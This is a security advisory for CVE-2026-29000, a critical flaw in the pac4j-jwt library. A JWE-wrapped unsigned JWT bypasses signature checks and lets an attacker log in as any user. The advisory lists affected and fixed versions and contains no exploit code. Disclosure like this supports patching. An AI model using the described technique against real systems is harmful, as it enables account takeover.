PT-2026-23074 · Pac4J-Jwt · Pac4J-Jwt

Amartya Jha

·

Published

2026-03-04

·

Updated

2026-03-16

·

CVE-2026-29000

CVSS v3.1
10
VectorAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
Name of the Vulnerable Software and Affected Versions pac4j-jwt versions prior to 4.5.9, 5.7.9, and 6.3.3
Description The 
JwtAuthenticator
component in the pac4j-jwt library has a flaw in how it validates cryptographic signatures of JWTs. An attacker with access to the server's RSA public key can create a specially crafted JWT (specifically a JWE-wrapped PlainJWT) with arbitrary subject and role claims, bypassing the signature verification process. This allows the attacker to authenticate as any user, including administrators. The issue arises because the library incorrectly trusts JWTs without proper signature verification when processing encrypted JWTs.
Recommendations Upgrade to pac4j-jwt version 4.5.9 or later. Upgrade to pac4j-jwt version 5.7.9 or later. Upgrade to pac4j-jwt version 6.3.3 or later.

Exploit

Fix

Improper Verification of Cryptographic Signature

Weakness Enumeration

CWE-347

Related Identifiers

BDU:2026-02532
CVE-2026-29000
GHSA-PM7G-W2CF-Q238

Affected Products

Pac4J-Jwt